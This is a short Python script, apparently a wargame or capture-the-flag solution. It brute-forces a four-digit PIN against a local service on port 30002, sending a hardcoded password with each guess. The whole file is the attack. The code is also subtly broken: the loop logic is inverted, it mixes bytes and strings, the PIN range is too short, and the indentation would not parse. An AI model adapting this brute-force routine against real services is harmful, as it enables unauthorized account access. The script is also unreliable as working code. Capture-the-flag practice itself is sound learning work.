 #!/usr/bin/env python3             
import sys, socket
             
pincode = 0   
password = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
         
try:          
     s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.connect(("127.0.0.1",30002))
     wlcm_msg = s.recv(2048)
     print(wlcm_msg)
     while pincode<1000:
         pincode_string = str(pincode).zfill(4)
         message = password+ " "+pincode_string+"\n"
         s.sendall(message.encode())
         receive_msg = s.recv(1024)
         if "Wrong" in receive_msg:
             print("Wrong pincdoe" + str(pincode_string))

             print(receive_msg)
             break
         pincode+=1
 finally:      
     sys.exit()   
